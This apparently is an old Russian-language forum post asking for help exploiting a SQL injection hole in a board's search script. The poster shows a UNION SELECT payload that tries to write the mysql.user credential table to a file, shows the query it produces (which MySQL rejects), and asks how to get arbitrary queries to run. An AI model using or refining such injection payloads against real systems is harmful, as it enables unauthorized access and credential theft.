По форуму пробежался, но так и не нашел ответа на свою ситуацию...
Дело вот в чем:
есть скрипт, принимает от пользователя переменную text(например) и использует ее для поиска по базе... переменная как вы и догадались не фильтруется совсем... + еще запрос показывается.. (фантазия извращенца)
я пробовал подставить переменную след. образом:
text='+UNION+SELECT+*+FROM+mysql.user+INTO+OUTFILE+"t.txt" --
Запрос после этого принимает вид:
select board.id, board.thread, author, subject, datestamp, body from board, board_bodies where board.id = board_bodies.id and board.approved='Y' AND ( datestamp >= '2003-10-24' ) AND (author like '%'+UNION+SELECT+*+FROM+mysql.user+INTO+OUTFILE+"t.txt" -- %') order by id desc limit 20
MySQL ругается на запрос...
Просьба подскажите как мне выполнить любой запрос через подобное. Похоже он не позволяет выполнить 2 запроса сразу.. как я хотел... а мне надо чтобы выполнился мой запрос, можно ли как нить заставить мускуль не выполнять, то, что до моих данных ?